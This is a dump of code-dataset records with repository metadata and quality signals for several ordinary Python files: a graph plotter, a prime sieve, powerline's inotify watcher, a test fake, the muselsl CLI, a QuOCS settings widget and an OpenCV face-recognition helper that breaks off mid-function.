The table below lists the dataset's columns and dtypes, in column order. Each record that follows gives its metadata, then the file content, and then its numeric quality fields in this same column order.

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | int64 |
| qsc_code_cate_encoded_data | null |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
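The quality-signal columns are the natural hooks for filtering rows of this table. The snippet below is a minimal sketch, assuming the rows have been exported to a local Parquet file and loaded with pandas; the file name `code_rows.parquet`, the thresholds, and the reading of `qsc_codepython_cate_ast_quality_signal == 1` as "the file parses" are illustrative assumptions, not something stated by the dataset itself.

```python
import pandas as pd

# Hypothetical export of the rows above; file name and thresholds are assumptions.
df = pd.read_parquet("code_rows.parquet")

mask = (
    (df["lang"] == "Python")
    & (df["alphanum_fraction"] > 0.25)                               # drop mostly non-alphanumeric files
    & (df["qsc_code_frac_chars_dupe_10grams_quality_signal"] < 0.5)  # drop heavily repetitive files
    & (df["qsc_codepython_cate_ast_quality_signal"] == 1)            # assumed: 1 means the file parses
)
print(f"kept {mask.sum()} of {len(df)} rows")
filtered = df[mask]
```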

hexsha: 608c22777b56d9cf666ec3250a4f4ccb1c127d26 | size: 848 | ext: py | lang: Python
max_stars / max_issues / max_forks: mcmc/plot_graph.py | hudalao/mcmc @ 148d9fbb9ebd85ee5bfd3601d80ebbd96bc25791 | licenses ["MIT"] | counts null | event datetimes null
content:
# commend the lines for plotting using
import matplotlib.pyplot as plt
import networkx as nx
def plot_graph(G, N, time_point, posi):
#setting up for graph plotting
#setting the positions for all nodes
pos = {}
for ii in range(N):
pos[ii] = posi[ii]
# plt.figure(time_point + 1)
elarge=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] >0.5]
esmall=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] <=0.5]
# nodes
# nx.draw_networkx_nodes(G[time_point],pos,node_size=200)
# edges
# nx.draw_networkx_edges(G[time_point],pos,edgelist=elarge,width=3)
# nx.draw_networkx_edges(G[time_point],pos,edgelist=esmall,width=3,alpha=0.5,edge_color='b',style='dashed')
# labels
# nx.draw_networkx_labels(G[time_point],pos,font_size=10,font_family='sans-serif')
avg_line_length: 33.92 | max_line_length: 110 | alphanum_fraction: 0.681604
qsc_*_quality_signal values (in the column order above): 148 | 848 | 3.763514 | 0.425676 | 0.129264 | 0.10772 | 0.093357 | 0.301616 | 0.301616 | 0.301616 | 0.301616 | 0.301616 | 0.157989 | 0 | 0.019774 | 0.165094 | 848 | 24 | 111 | 35.333333 | 0.766949 | 0.554245 | 0 | 0 | 0 | 0 | 0.032877 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.375 | 0
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 608d2fef138f592a57bb71b64db9742a86c572f7 | size: 293 | ext: py | lang: Python
max_stars: Number Theory/Sieve_of_Eratosthenes.py | mishrakeshav/Competitive-Programming @ b25dcfeec0fb9a9c71bf3a05644b619f4ca83dd2 | licenses ["MIT"] | count 2 | events 2020-06-25T21:10:32.000Z to 2020-12-10T06:53:45.000Z
max_issues: same path, repo and licenses | count null | events null
max_forks: same path, repo and licenses | count 3 | events 2020-05-15T14:17:09.000Z to 2021-07-25T13:18:20.000Z
content:
from sys import stdin
input = stdin.readline
N = int(input())
primes = [1]*(N+1)
primes[0] = 0
primes[1] = 0
for i in range(2,int(N**0.5)+1):
if primes[i]:
for j in range(i*i,N+1,i):
primes[j] = 0
for i in range(N+1):
if primes[i]:
print(i,end = " ")
avg_line_length: 19.533333 | max_line_length: 34 | alphanum_fraction: 0.522184
qsc_*_quality_signal values (in the column order above): 57 | 293 | 2.684211 | 0.368421 | 0.039216 | 0.065359 | 0.091503 | 0.156863 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062201 | 0.286689 | 293 | 14 | 35 | 20.928571 | 0.669856 | 0 | 0 | 0.153846 | 0 | 0 | 0.003413 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0.076923
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 608e2946d7df6fc1e0129b19ce4192449ba804b9 | size: 6,118 | ext: py | lang: Python
max_stars: powerline/lib/tree_watcher.py | kruton/powerline @ f6ddb95da5f41b8285cffd1d17c1ef46dc08a7d6 | licenses ["MIT"] | count 19 | events 2015-09-01T20:49:16.000Z to 2022-01-08T22:13:23.000Z
max_issues: same path, repo and licenses | count null | events null
max_forks: same path, repo and licenses | count 6 | events 2019-04-25T03:42:35.000Z to 2020-06-05T15:25:23.000Z
content:
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, absolute_import, print_function)
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import sys
import os
import errno
from time import sleep
from powerline.lib.monotonic import monotonic
from powerline.lib.inotify import INotify, INotifyError
class NoSuchDir(ValueError):
pass
class BaseDirChanged(ValueError):
pass
class DirTooLarge(ValueError):
def __init__(self, bdir):
ValueError.__init__(self, 'The directory {0} is too large to monitor. Try increasing the value in /proc/sys/fs/inotify/max_user_watches'.format(bdir))
def realpath(path):
return os.path.abspath(os.path.realpath(path))
class INotifyTreeWatcher(INotify):
is_dummy = False
def __init__(self, basedir, ignore_event=None):
super(INotifyTreeWatcher, self).__init__()
self.basedir = realpath(basedir)
self.watch_tree()
self.modified = True
self.ignore_event = (lambda path, name: False) if ignore_event is None else ignore_event
def watch_tree(self):
self.watched_dirs = {}
self.watched_rmap = {}
try:
self.add_watches(self.basedir)
except OSError as e:
if e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
def add_watches(self, base, top_level=True):
''' Add watches for this directory and all its descendant directories,
recursively. '''
base = realpath(base)
# There may exist a link which leads to an endless
# add_watches loop or to maximum recursion depth exceeded
if not top_level and base in self.watched_dirs:
return
try:
is_dir = self.add_watch(base)
except OSError as e:
if e.errno == errno.ENOENT:
# The entry could have been deleted between listdir() and
# add_watch().
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
if e.errno == errno.EACCES:
# We silently ignore entries for which we dont have permission,
# unless they are the top level dir
if top_level:
raise NoSuchDir('You do not have permission to monitor {0}'.format(base))
return
raise
else:
if is_dir:
try:
files = os.listdir(base)
except OSError as e:
if e.errno in (errno.ENOTDIR, errno.ENOENT):
# The dir was deleted/replaced between the add_watch()
# and listdir()
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
raise
for x in files:
self.add_watches(os.path.join(base, x), top_level=False)
elif top_level:
# The top level dir is a file, not good.
raise NoSuchDir('The dir {0} does not exist'.format(base))
def add_watch(self, path):
import ctypes
bpath = path if isinstance(path, bytes) else path.encode(self.fenc)
wd = self._add_watch(self._inotify_fd, ctypes.c_char_p(bpath),
# Ignore symlinks and watch only directories
self.DONT_FOLLOW | self.ONLYDIR |
self.MODIFY | self.CREATE | self.DELETE |
self.MOVE_SELF | self.MOVED_FROM | self.MOVED_TO |
self.ATTRIB | self.DELETE_SELF)
if wd == -1:
eno = ctypes.get_errno()
if eno == errno.ENOTDIR:
return False
raise OSError(eno, 'Failed to add watch for: {0}: {1}'.format(path, self.os.strerror(eno)))
self.watched_dirs[path] = wd
self.watched_rmap[wd] = path
return True
def process_event(self, wd, mask, cookie, name):
if wd == -1 and (mask & self.Q_OVERFLOW):
# We missed some INOTIFY events, so we dont
# know the state of any tracked dirs.
self.watch_tree()
self.modified = True
return
path = self.watched_rmap.get(wd, None)
if path is not None:
self.modified = not self.ignore_event(path, name)
if mask & self.CREATE:
# A new sub-directory might have been created, monitor it.
try:
self.add_watch(os.path.join(path, name))
except OSError as e:
if e.errno == errno.ENOENT:
# Deleted before add_watch()
pass
elif e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
else:
raise
if (mask & self.DELETE_SELF or mask & self.MOVE_SELF) and path == self.basedir:
raise BaseDirChanged('The directory %s was moved/deleted' % path)
def __call__(self):
self.read()
ret = self.modified
self.modified = False
return ret
class DummyTreeWatcher(object):
is_dummy = True
def __init__(self, basedir):
self.basedir = realpath(basedir)
def __call__(self):
return False
class TreeWatcher(object):
def __init__(self, expire_time=10):
self.watches = {}
self.last_query_times = {}
self.expire_time = expire_time * 60
def watch(self, path, logger=None, ignore_event=None):
path = realpath(path)
try:
w = INotifyTreeWatcher(path, ignore_event=ignore_event)
except (INotifyError, DirTooLarge) as e:
if logger is not None and not isinstance(e, INotifyError):
logger.warn('Failed to watch path: {0} with error: {1}'.format(path, e))
w = DummyTreeWatcher(path)
self.watches[path] = w
return w
def is_actually_watched(self, path):
w = self.watches.get(path, None)
return not getattr(w, 'is_dummy', True)
def expire_old_queries(self):
pop = []
now = monotonic()
for path, lt in self.last_query_times.items():
if now - lt > self.expire_time:
pop.append(path)
for path in pop:
del self.last_query_times[path]
def __call__(self, path, logger=None, ignore_event=None):
path = realpath(path)
self.expire_old_queries()
self.last_query_times[path] = monotonic()
w = self.watches.get(path, None)
if w is None:
try:
self.watch(path, logger=logger, ignore_event=ignore_event)
except NoSuchDir:
pass
return True
try:
return w()
except BaseDirChanged:
self.watches.pop(path, None)
return True
except DirTooLarge as e:
if logger is not None:
logger.warn(str(e))
self.watches[path] = DummyTreeWatcher(path)
return False
if __name__ == '__main__':
w = INotifyTreeWatcher(sys.argv[-1])
w()
print ('Monitoring', sys.argv[-1], 'press Ctrl-C to stop')
try:
while True:
if w():
print (sys.argv[-1], 'changed')
sleep(1)
except KeyboardInterrupt:
raise SystemExit(0)
avg_line_length: 27.936073 | max_line_length: 152 | alphanum_fraction: 0.698431
qsc_*_quality_signal values (in the column order above): 897 | 6,118 | 4.610925 | 0.259755 | 0.029255 | 0.007253 | 0.015474 | 0.183027 | 0.153046 | 0.127901 | 0.127901 | 0.079545 | 0.062621 | 0 | 0.005078 | 0.195325 | 6,118 | 218 | 153 | 28.06422 | 0.83506 | 0.112782 | 0 | 0.319527 | 0 | 0.005917 | 0.083256 | 0.006846 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088757 | false | 0.023669 | 0.047337 | 0.011834 | 0.278107 | 0.017751
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 60903b5f4352258ad0e0ec223250ecb5c743a43e | size: 3,642 | ext: py | lang: Python
max_stars / max_issues / max_forks: python/qisys/test/fake_interact.py | PrashantKumar-sudo/qibuild @ a16ce425cf25127ceff29507feeeeca37af23351 | licenses ["BSD-3-Clause"] | counts null | event datetimes null
content:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Fake Interact """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
class FakeInteract(object):
""" A class to tests code depending on qisys.interact """
def __init__(self):
""" FakeInteract Init """
self.answers_type = None
self.answer_index = -1
self._answers = None
self.questions = list()
self.editor = None
@property
def answers(self):
""" Answers Getter """
if self._answers is None:
raise Exception("FakeInteract not initialized")
return self._answers
@answers.setter
def answers(self, value):
""" Answers Setter """
if isinstance(value, dict):
self.answers_type = "dict"
elif isinstance(value, list):
self.answers_type = "list"
else:
raise Exception("Unknow answer type: " + type(value))
self._answers = value
def find_answer(self, message, choices=None, default=None):
""" Find Answer """
keys = self.answers.keys()
for key in keys:
if key in message.lower():
if not choices:
return self.answers[key]
answer = self.answers[key]
if answer in choices:
return answer
else:
mess = "Would answer %s\n" % answer
mess += "But choices are: %s\n" % choices
raise Exception(mess)
if default is not None:
return default
mess = "Could not find answer for\n :: %s\n" % message
mess += "Known keys are: %s" % ", ".join(keys)
raise Exception(mess)
def ask_choice(self, choices, message, **_unused):
""" Ask Choice """
print("::", message)
for choice in choices:
print("* ", choice)
answer = self._get_answer(message, choices)
print(">", answer)
return answer
def ask_yes_no(self, message, default=False):
""" Ask Yes / No """
print("::", message,)
if default:
print("(Y/n)")
else:
print("(y/N)")
answer = self._get_answer(message, default=default)
print(">", answer)
return answer
def ask_path(self, message):
""" Ask Path """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_string(self, message):
""" Ask String """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_program(self, message):
""" Ask Program """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def get_editor(self):
""" Return the Editor """
return self.editor
def _get_answer(self, message, choices=None, default=None):
""" Get an Answer """
question = dict()
question['message'] = message
question['choices'] = choices
question['default'] = default
self.questions.append(question)
if self.answers_type == "dict":
return self.find_answer(message, choices=choices, default=default)
self.answer_index += 1
return self.answers[self.answer_index]
avg_line_length: 31.396552 | max_line_length: 84 | alphanum_fraction: 0.556013
qsc_*_quality_signal values (in the column order above): 397 | 3,642 | 4.969773 | 0.274559 | 0.072478 | 0.032945 | 0.04815 | 0.195641 | 0.169285 | 0.139888 | 0.100355 | 0.100355 | 0.100355 | 0 | 0.004482 | 0.326194 | 3,642 | 115 | 85 | 31.669565 | 0.799511 | 0.113674 | 0 | 0.270588 | 0 | 0 | 0.064209 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129412 | false | 0 | 0.035294 | 0 | 0.317647 | 0.164706
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 6090c304e6f8f9a2666ec59c479f530bc3d45c1f | size: 7,727 | ext: py | lang: Python
max_stars: muselsl/cli.py | kowalej/muse-lsl @ 9086f2588bee3b2858b0ff853b7a08cdcd0e7612 | licenses ["BSD-3-Clause"] | count 2 | events 2020-12-04T15:01:19.000Z to 2021-11-20T23:05:38.000Z
max_issues: muselsl/cli.py | fahad101/muse-lsl @ 32aced5eb29db8834cbffd8533607e8d32cfa2b7 | licenses ["BSD-3-Clause"] | count null | events null
max_forks: muselsl/cli.py | fahad101/muse-lsl @ 32aced5eb29db8834cbffd8533607e8d32cfa2b7 | licenses ["BSD-3-Clause"] | count 1 | events 2020-12-03T21:28:01.000Z to 2020-12-03T21:28:01.000Z
content:
#!/usr/bin/python
import sys
import argparse
class main:
def __init__(self):
parser = argparse.ArgumentParser(
description='Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset.',
usage='''muselsl <command> [<args>]
Available commands:
list List available Muse devices.
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
stream Start an LSL stream from Muse headset.
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
view Visualize EEG data from an LSL stream.
-w --window Window length to display in seconds.
-s --scale Scale in uV.
-r --refresh Refresh rate in seconds.
-f --figure Window size.
-v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).
record Record EEG data from an LSL stream.
-d --duration Duration of the recording in seconds.
-f --filename Name of the recording file.
-dj --dejitter Whether to apply dejitter correction to timestamps.
record_direct Record data directly from Muse headset (no LSL).
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
''')
parser.add_argument('command', help='Command to run.')
# parse_args defaults to [1:] for args, but you need to
# exclude the rest of the args too, or validation will fail
args = parser.parse_args(sys.argv[1:2])
if not hasattr(self, args.command):
print('Incorrect usage. See help below.')
parser.print_help()
exit(1)
# use dispatch pattern to invoke method with same name
getattr(self, args.command)()
def list(self):
parser = argparse.ArgumentParser(
description='List available Muse devices.')
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import list_muses
list_muses(args.backend, args.interface)
def stream(self):
parser = argparse.ArgumentParser(
description='Start an LSL stream from Muse headset.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import stream
stream(args.address, args.backend,
args.interface, args.name)
def record(self):
parser = argparse.ArgumentParser(
description='Record data from an LSL stream.')
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
parser.add_argument("-dj", "--dejitter",
dest="dejitter", type=bool, default=True,
help="Whether to apply dejitter correction to timestamps.")
args = parser.parse_args(sys.argv[2:])
from . import record
record(args.duration, args.filename, args.dejitter)
def record_direct(self):
parser = argparse.ArgumentParser(
description='Record directly from Muse without LSL.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
args = parser.parse_args(sys.argv[2:])
from . import record_direct
record_direct(args.address, args.backend,
args.interface, args.name, args.duration, args.filename)
def view(self):
parser = argparse.ArgumentParser(
description='View EEG data from an LSL stream.')
parser.add_argument("-w", "--window",
dest="window", type=float, default=5.,
help="Window length to display in seconds.")
parser.add_argument("-s", "--scale",
dest="scale", type=float, default=100,
help="Scale in uV.")
parser.add_argument("-r", "--refresh",
dest="refresh", type=float, default=0.2,
help="Refresh rate in seconds.")
parser.add_argument("-f", "--figure",
dest="figure", type=str, default="15x6",
help="Window size.")
parser.add_argument("-v", "--version",
dest="version", type=int, default=1,
help="Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).")
args = parser.parse_args(sys.argv[2:])
from . import view
view(args.window, args.scale, args.refresh, args.figure, args.version)
avg_line_length: 52.209459 | max_line_length: 140 | alphanum_fraction: 0.533325
qsc_*_quality_signal values (in the column order above): 876 | 7,727 | 4.659817 | 0.175799 | 0.046301 | 0.087457 | 0.039686 | 0.693533 | 0.641842 | 0.571044 | 0.534297 | 0.499755 | 0.490691 | 0 | 0.009447 | 0.356154 | 7,727 | 147 | 141 | 52.564626 | 0.811055 | 0.023424 | 0 | 0.480916 | 0 | 0.038168 | 0.421639 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045802 | false | 0 | 0.053435 | 0 | 0.10687 | 0.015267
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 609290208240ce63b7e6295f7ddcd5f772b8a453 | size: 2,420 | ext: py | lang: Python
max_stars: src/quocspyside2interface/gui/freegradients/GeneralSettingsNM.py | Quantum-OCS/QuOCS-pyside2interface @ 69436666a67da6884aed1ddd087b7062dcd2ad90 | licenses ["Apache-2.0"] | count 1 | events 2021-03-27T17:41:16.000Z to 2021-03-27T17:41:16.000Z
max_issues: same path, repo and licenses | count null | events null
max_forks: same path, repo and licenses | count null | events null
content:
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from qtpy import QtWidgets
from quocspyside2interface.gui.uiclasses.GeneralSettingsNMUI import Ui_Form
from quocspyside2interface.gui.freegradients.StoppingCriteriaNM import StoppingCriteriaNM
from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary import NelderMeadDictionary
class GeneralSettingsNM(QtWidgets.QWidget, Ui_Form):
def __init__(self, loaded_dictionary=None):
super().__init__()
self.setupUi(self)
nm_dictionary, stopping_criteria_dictionary = None, None
if loaded_dictionary is not None:
nm_dictionary = loaded_dictionary["general_settings"]
stopping_criteria_dictionary = loaded_dictionary["stopping_criteria"]
# Nelder Mead Dictionary
self.nelder_mead_dictionary = NelderMeadDictionary(loaded_dictionary=nm_dictionary)
# Create widget
self.stopping_criteria_form = StoppingCriteriaNM(loaded_dictionary=stopping_criteria_dictionary)
# Connection
self.is_adaptive_checkbox.stateChanged.connect(self.set_is_adaptive)
self._initialization()
def _initialization(self):
self.is_adaptive_checkbox.setChecked(self.nelder_mead_dictionary.is_adaptive)
self.stopping_criteria_scroll_area.setWidget(self.stopping_criteria_form)
def set_is_adaptive(self):
self.nelder_mead_dictionary.is_adaptive = self.is_adaptive_checkbox.isChecked()
def get_dictionary(self):
return {"dsm_settings": {"general_settings": self.nelder_mead_dictionary.get_dictionary(),
"stopping_criteria": self.stopping_criteria_form.get_dictionary()}}
avg_line_length: 48.4 | max_line_length: 110 | alphanum_fraction: 0.704132
qsc_*_quality_signal values (in the column order above): 259 | 2,420 | 6.332046 | 0.440154 | 0.087805 | 0.060976 | 0.058537 | 0.046341 | 0.046341 | 0.046341 | 0 | 0 | 0 | 0 | 0.005413 | 0.160331 | 2,420 | 50 | 111 | 48.4 | 0.801673 | 0.32438 | 0 | 0 | 0 | 0 | 0.048237 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0.041667 | 0.416667 | 0
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 6096d49f97f28ce9400a93ea2f44d5ab24de77e4 | size: 2,701 | ext: py | lang: Python
max_stars: faceRecognition.py | sequery/Face-Recognition-Project @ 84d29322228e140c3d18c9c4d169819375a8e256 | licenses ["MIT"] | count 2 | events 2020-12-23T13:39:54.000Z to 2021-01-11T15:34:29.000Z
max_issues: same path, repo and licenses | count null | events null
max_forks: same path, repo and licenses | count null | events null
content:
import cv2
import os
import numpy as np
# This module contains all common functions that are called in tester.py file
# Given an image below function returns rectangle for face detected alongwith gray scale image
def faceDetection(test_img):
gray_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY) # convert color image to grayscale
face_haar_cascade = cv2.CascadeClassifier('HaarCascade/haarcascade_frontalface_default.xml') # Load haar classifier
faces = face_haar_cascade.detectMultiScale(gray_img, scaleFactor=1.32,
minNeighbors=5) # detectMultiScale returns rectangles
return faces, gray_img
# Given a directory below function returns part of gray_img which is face alongwith its label/ID
def labels_for_training_data(directory):
faces = []
faceID = []
for path, subdirnames, filenames in os.walk(directory):
for filename in filenames:
if filename.startswith("."):
print("Skipping system file") # Skipping files that startwith .
continue
id = os.path.basename(path) # fetching subdirectory names
img_path = os.path.join(path, filename) # fetching image path
print("img_path:", img_path)
print("id:", id)
test_img = cv2.imread(img_path) # loading each image one by one
if test_img is None:
print("Image not loaded properly")
continue
faces_rect, gray_img = faceDetection(
test_img) # Calling faceDetection function to return faces detected in particular image
if len(faces_rect) != 1:
continue # Since we are assuming only single person images are being fed to classifier
(x, y, w, h) = faces_rect[0]
roi_gray = gray_img[y:y + w, x:x + h] # cropping region of interest i.e. face area from grayscale image
faces.append(roi_gray)
faceID.append(int(id))
return faces, faceID
# Below function trains haar classifier and takes faces,faceID returned by previous function as its arguments
def train_classifier(faces, faceID):
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.train(faces, np.array(faceID))
return face_recognizer
# Below function draws bounding boxes around detected face in image
def draw_rect(test_img, face):
(x, y, w, h) = face
cv2.rectangle(test_img, (x, y), (x + w, y + h), (255, 0, 0), thickness=5)
# Below function writes name of person for detected label
def put_text(test_img, text, x, y):
